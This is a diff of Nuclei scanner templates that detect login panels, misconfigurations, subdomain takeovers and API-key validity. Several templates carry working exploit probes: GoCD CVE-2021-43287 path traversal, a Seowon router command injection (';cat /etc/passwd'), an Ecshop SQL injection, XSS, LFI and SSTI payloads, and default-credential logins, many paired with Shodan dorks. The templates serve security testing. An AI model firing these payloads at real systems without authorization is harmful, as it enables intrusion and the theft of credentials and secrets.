- type: word
part: body
words:
- "System.ArgumentNullException"

View File

@ -0,0 +1,28 @@
id: CVE-2021-43287
info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: cve,cve2021,go,lfi,gocd
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,37 @@
id: pentaho-default-login
info:
name: Pentaho Default Login
author: pussycat0x
severity: high
metadata:
shodan-query: 'pentaho'
tags: pentaho,default-login
requests:
- raw:
- |
POST /pentaho/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
j_username={{user}}&j_password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'pentaho/Home'
- 'JSESSIONID='
condition: and
- type: status
status:
- 302

View File

@ -0,0 +1,32 @@
id: acemanager-login
info:
name: ACEmanager detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="ACEmanager"'
tags: login,tech,acemanager
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>::: ACEmanager :::</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'ALEOS Version ([0-9.]+) \| Copyright &co'

View File

@ -0,0 +1,26 @@
id: cisco-prime-infrastructure
info:
name: Cisco Prime Infrastructure
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"prime infrastructure"'
tags: panel,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/webacs/pages/common/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'productName = "Prime Infrastructure"'
- "Cisco&nbsp;"
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: gocd-login
info:
name: GoCD Login
author: dhiyaneshDK
severity: info
tags: go,panel,gocd
metadata:
shodan-query: 'html:"GoCD Version"'
requests:
- method: GET
path:
- '{{BaseURL}}/go/auth/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Login - Go</title>'
- 'gocd-params'
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: kenesto-login
info:
name: Kenesto Login Detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="kenesto"'
tags: login,tech,kenesto
requests:
- method: GET
path:
- "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Welcome To Kenesto&reg;</title>'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: kerio-connect-client
info:
name: Kerio Connect Client
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Kerio Connect Client"'
tags: panel,kerio
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/login/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Kerio Connect Client</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: meshcentral-login
info:
name: MeshCentral - Login
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"MeshCentral - Login"'
tags: panel,meshcentral
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>MeshCentral - Login</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,19 @@
id: pentaho-panel
info:
name: Pentaho Panel
author: princechaddha,dhiyaneshDK
severity: info
metadata:
shodan-query: 'pentaho'
tags: panel,pentaho
requests:
- method: GET
path:
- '{{BaseURL}}/pentaho/Login'
matchers:
- type: word
words:
- '<title>Pentaho User Console - Login</title>'

View File

@ -0,0 +1,25 @@
id: shoutcast-server
info:
name: SHOUTcast Server
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"SHOUTcast Server"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/index.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SHOUTcast Server</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: sitecore-login
info:
name: SiteCore Login
author: dhiyaneshDK
severity: info
metadata:
shodan-query: 'http.title:"Welcome to Sitecore"'
tags: panel,sitecore
requests:
- method: GET
path:
- '{{BaseURL}}/sitecore/login/default.aspx'
matchers-condition: and
matchers:
- type: word
words:
- '/sitecore/shell/Themes/Standard/Default/Login.css'
- type: status
status:
- 200

View File

@ -4,13 +4,25 @@ info:
name: Apache Solr Exposure name: Apache Solr Exposure
author: pdteam author: pdteam
severity: medium severity: medium
tags: panel tags: panel,solr
metadata:
shodan-query: http.title:"Solr Admin"
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/solr/' - '{{BaseURL}}/solr/'
- '{{BaseURL}}'
stop-at-first-match: true
matchers: matchers:
- type: word - type: word
words: words:
- "<title>Solr Admin</title>" - "<title>Solr Admin</title>"
extractors:
- type: regex
part: body
group: 1
regex:
- 'favicon\.ico\?_=([0-9.]+)'

View File

@ -0,0 +1,24 @@
id: weblogic-login
info:
name: Weblogic Login Panel
author: bing0o
severity: info
tags: panel,weblogic
metadata:
shodan-query: product:"Oracle Weblogic"
requests:
- method: GET
path:
- "{{BaseURL}}/console/login/LoginForm.jsp"
matchers-condition: and
matchers:
- type: word
words:
- "WebLogic"
- type: status
status:
- 200

View File

@ -1,8 +1,8 @@
id: wordpress-panel id: wordpress-login
info: info:
name: WordPress Panel name: WordPress login
author: github.com/its0x08 author: its0x08
severity: info severity: info
tags: panel tags: panel

View File

@ -1,37 +0,0 @@
id: gitlab-graphql-user-enum
info:
name: Gitlab User enumeration via Graphql API
author: pikpikcu
severity: info
tags: gitlab,enum,misconfig
requests:
- method: POST
path:
- "{{BaseURL}}/api/graphql"
headers:
Content-Type: application/json
body: |
{
"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
condition: and
words:
- avatarUrl
- username
- email
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
name: GitLab - User Enumeration name: GitLab - User Enumeration
severity: info severity: info
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
tags: gitlab,enum,misconfig tags: gitlab,enum,misconfig,fuzz
requests: requests:
- raw: - raw:

View File

@ -0,0 +1,31 @@
id: gocd-cruise-configuration
info:
name: GoCd Cruise Configuration disclosure
author: dhiyaneshDk
severity: high
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: go,gocd,config,exposure,misconfig
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "server agentAutoRegisterKey"
- "webhookSecret"
- "tokenGenerationKey"
condition: and

View File

@ -0,0 +1,39 @@
id: gocd-encryption-key
info:
name: GoCd Encryption Key
author: dhiyaneshDk
severity: low
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: go,gocd,exposure,misconfig
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "([a-z0-9]){32}"
- type: word
part: header
words:
- "text/plain"
extractors:
- type: regex
regex:
- "([a-z0-9]){32}"

View File

@ -0,0 +1,29 @@
id: gocd-unauth-dashboard
info:
name: GoCd Unauth Dashboard
author: dhiyaneshDk
severity: medium
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
tags: go,gocd,unauth,misconfig
requests:
- method: GET
path:
- '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Create a pipeline - Go</title>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -3,7 +3,7 @@ id: nginx-status
info: info:
name: Nginx Status Page name: Nginx Status Page
author: dhiyaneshDK author: dhiyaneshDK
severity: low severity: info
tags: misconfig,nginx tags: misconfig,nginx
requests: requests:

View File

@ -0,0 +1,24 @@
id: sitecore-debug-page
info:
name: SiteCore Debug Page
author: dhiyaneshDK
severity: low
metadata:
shodan-query: 'http.title:"Welcome to Sitecore"'
tags: debug,sitecore
requests:
- method: GET
path:
- "{{BaseURL}}/sitecore/'"
matchers-condition: and
matchers:
- type: word
words:
- 'extranet\Anonymous'
- type: status
status:
- 404

17
network/samba-detect.yaml Normal file
View File

@ -0,0 +1,17 @@
id: samba-detection
info:
name: samba detection
author: pussycat0x
severity: info
tags: network,smb, samba
network:
- inputs:
- data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:139"
matchers:
- type: word
words:
- "SMBr"

View File

@ -11,7 +11,13 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "<h1>Oops! We couldn&#8217;t find that page.</h1>" - "<h1>Oops! We couldn&#8217;t find that page.</h1>"
- type: dsl
dsl:
- '!contains(host,"bigcartel.com")'

View File

@ -16,11 +16,11 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- There is no helpdesk here! - 'There is no helpdesk here!'
- Maybe this is still fresh! - 'May be this is still fresh!'
- 'freshdesk.com/signup'
condition: and condition: and
- type: word - type: dsl
words: dsl:
- "freshservice.com" - '!contains(host,"freshpo.com")'
negative: true

View File

@ -12,8 +12,13 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "There isn't a GitHub Pages site here." - "There isn't a GitHub Pages site here."
- "For root URLs (like http://example.com/) you must provide an index.html file" - "For root URLs (like http://example.com/) you must provide an index.html file"
- type: dsl
dsl:
- '!contains(host,"githubapp.com")'

View File

@ -12,8 +12,18 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "Sorry, this shop is currently unavailable."
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
- "Sorry, this shop is currently unavailable."
condition: or
- type: word
words:
- 'shop-not-found'
- type: dsl
dsl:
- '!contains(host,"myshopify.com")'

View File

@ -12,9 +12,14 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- Whatever you were looking for doesn't currently exist at this address. - Whatever you were looking for doesn't currently exist at this address.
- There's nothing here. - There's nothing here.
condition: and condition: and
- type: dsl
dsl:
- '!contains(host,"tumblr.com")'

View File

@ -0,0 +1,30 @@
id: fastjson-version
info:
name: Fastjson Version Detection
author: yuansec
severity: info
description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76).
reference: https://blog.csdn.net/caiqiiqi/article/details/107907489
tags: fastjson,tech
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"@type":"java.lang.AutoCloseable"
matchers:
- type: word
words:
- 'fastjson-version'
extractors:
- type: regex
part: body
group: 1
regex:
- 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)'

View File

@ -0,0 +1,24 @@
id: sitecore-default-page
info:
name: Sitecore Default Page
author: DhiyaneshDK
severity: info
metadata:
shodan-query: http.title:"Welcome to Sitecore"
tags: tech,sitecore
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to Sitecore"
- type: status
status:
- 200

View File

@ -2,16 +2,25 @@ id: weblogic-detect
info: info:
name: Detect Weblogic name: Detect Weblogic
author: bing0o author: pdteam
severity: info severity: info
tags: tech,weblogic tags: tech,weblogic
metadata:
shodan-query: product:"Oracle Weblogic"
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/console/login/LoginForm.jsp" - "{{BaseURL}}/{{randstr}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "WebLogic" - "From RFC 2068"
- "Error 404--Not Found"
condition: and
- type: status
status:
- 404

View File

@ -4,7 +4,9 @@ info:
name: AbuseIPDB API Test name: AbuseIPDB API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://docs.abuseipdb.com/ reference:
- https://docs.abuseipdb.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
tags: token-spray,abuseipdb tags: token-spray,abuseipdb
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: AlienVault Open Threat Exchange (OTX) API Test name: AlienVault Open Threat Exchange (OTX) API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://otx.alienvault.com/api reference:
- https://otx.alienvault.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
tags: token-spray,alienvault tags: token-spray,alienvault
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: AniAPI API Test name: AniAPI API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://aniapi.com/docs/authentication reference:
- https://aniapi.com/docs/authentication
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
tags: token-spray,aniapi tags: token-spray,aniapi
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: Cooper Hewitt API name: Cooper Hewitt API
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://collection.cooperhewitt.org/api/methods/ reference:
- https://collection.cooperhewitt.org/api/methods/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
tags: token-spray,cooperhewitt tags: token-spray,cooperhewitt
self-contained: true self-contained: true

View File

@ -0,0 +1,25 @@
id: api-covalent
info:
name: Covalent API Test
author: daffainfo
severity: info
reference:
- https://www.covalenthq.com/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
tags: token-spray,covalent
self-contained: true
requests:
- method: GET
path:
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
matchers:
- type: word
part: body
words:
- '"address":'
- '"updated_at":'
- '"next_update_at":'
condition: and

View File

@ -4,7 +4,9 @@ info:
name: Dribbble API Test name: Dribbble API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://developer.dribbble.com/v2/ reference:
- https://developer.dribbble.com/v2/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
tags: token-spray,dribbble tags: token-spray,dribbble
self-contained: true self-contained: true

View File

@ -0,0 +1,31 @@
id: api-etherscan
info:
name: Etherscan API Test
author: daffainfo
severity: info
reference:
- https://docs.etherscan.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
tags: token-spray,etherscan
self-contained: true
requests:
- method: GET
path:
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'Invalid API Key'
- type: word
part: body
words:
- '"status":'
- '"message":"OK"'
condition: and

View File

@ -4,7 +4,9 @@ info:
name: Europeana API Test name: Europeana API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://pro.europeana.eu/page/search reference:
- https://pro.europeana.eu/page/search
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
tags: token-spray,europeana tags: token-spray,europeana
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: IUCN API Test name: IUCN API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: http://apiv3.iucnredlist.org/api/v3/docs reference:
- http://apiv3.iucnredlist.org/api/v3/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
tags: token-spray,iucn tags: token-spray,iucn
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: MyAnimeList API Test name: MyAnimeList API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://myanimelist.net/apiconfig/references/api/v2 reference:
- https://myanimelist.net/apiconfig/references/api/v2
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
tags: token-spray,myanimelist tags: token-spray,myanimelist
self-contained: true self-contained: true

View File

@ -0,0 +1,28 @@
id: api-nownodes
info:
name: Nownodes API Test
author: daffainfo
severity: info
reference:
- https://nownodes.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
tags: token-spray,nownodes
self-contained: true
requests:
- raw:
- |
GET https://bsc-blockbook.nownodes.io/api HTTP/1.1
Host: bsc-blockbook.nownodes.io
api-key: {{token}}
Content-Type: application/json
matchers:
- type: word
part: body
words:
- '"coin":'
- '"host":'
- '"version":'
condition: and

View File

@ -4,7 +4,9 @@ info:
name: Rijksmuseum API Test name: Rijksmuseum API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://data.rijksmuseum.nl/user-generated-content/api/ reference:
- https://data.rijksmuseum.nl/user-generated-content/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
tags: token-spray,rijksmuseum tags: token-spray,rijksmuseum
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: TheCatApi API Test name: TheCatApi API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://docs.thecatapi.com/ reference:
- https://docs.thecatapi.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
tags: token-spray,thecatapi tags: token-spray,thecatapi
self-contained: true self-contained: true

View File

@ -0,0 +1,27 @@
id: api-thedogapi
info:
name: TheDogApi API Test
author: daffainfo
severity: info
reference:
- https://docs.thedogapi.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
tags: token-spray,thedogapi
self-contained: true
requests:
- method: GET
path:
- "https://api.thedogapi.com/v1/votes"
headers:
x-api-key: "{{token}}"
matchers:
- type: word
part: body
words:
- 'id":'
- 'image_id":'
- 'sub_id":'
condition: and

View File

@ -4,7 +4,9 @@ info:
name: URLScan API Test name: URLScan API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://urlscan.io/docs/api/ reference:
- https://urlscan.io/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
tags: token-spray,urlscan tags: token-spray,urlscan
self-contained: true self-contained: true

View File

@ -4,7 +4,9 @@ info:
name: VirusTotal API Test name: VirusTotal API Test
author: daffainfo author: daffainfo
severity: info severity: info
reference: https://developers.virustotal.com/reference#getting-started reference:
- https://developers.virustotal.com/reference
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
tags: token-spray,virustotal tags: token-spray,virustotal
self-contained: true self-contained: true

View File

@ -0,0 +1,27 @@
id: ecshop-sqli
info:
name: Ecshop SQLi
author: Lark-lab,ImNightmaree
severity: high
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
tags: sqli,php,ecshop
requests:
- raw:
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
matchers:
- type: word
words:
- 'XPATH syntax error:'
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and

View File

@ -0,0 +1,32 @@
id: seowon-router-rce
info:
name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
reference: https://www.exploit-db.com/exploits/50295
tags: rce,seowon,router,unauth
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,19 +5,21 @@ info:
author: madrobot author: madrobot
severity: high severity: high
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
tags: php,ssti tags: php,ssti,twig
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D" - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
skip-variables-check: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "1788906" - "1788906"
part: body
- type: status - type: status
status: status:
- 404 - 404

View File

@ -0,0 +1,34 @@
id: vanguard-post-xss
info:
name: Vanguard Marketplace CMS ≤ 2.1
author: ImNightmaree
severity: medium
description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
tags: vanguard,xss
requests:
- raw:
- |
POST /search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: ad-widget-lfi
info:
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
author: 0x_Akoko
severity: high
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
reference:
- https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -1,10 +1,10 @@
id: rdf-user-enumeration id: wordpress-rdf-user-enum
info: info:
name: Wordpress RDF User Enumeration name: Wordpress RDF User Enumeration
author: r3dg33k author: r3dg33k
severity: info severity: info
tags: wordpress tags: wordpress,enum
requests: requests:
- method: GET - method: GET
@ -36,4 +36,4 @@ requests:
part: body part: body
group: 1 group: 1
regex: regex:
- '<dc:creator><!\[CDATA\[([a-z]+)\]\]><\/dc:creator>' - '<dc\:creator><\!\[CDATA\[(.*?)\]\]></dc'

View File

@ -0,0 +1,10 @@
id: gocd-workflow
info:
name: GoCD Security Checks
author: dhiyaneshDk
description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target.
workflows:
- template: exposed-panels/gocd-login.yaml
subtemplates:
- tags: gocd

View File

@ -0,0 +1,13 @@
id: sitecore-workflow
info:
name: SiteCore Security Checks
author: pdteam
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml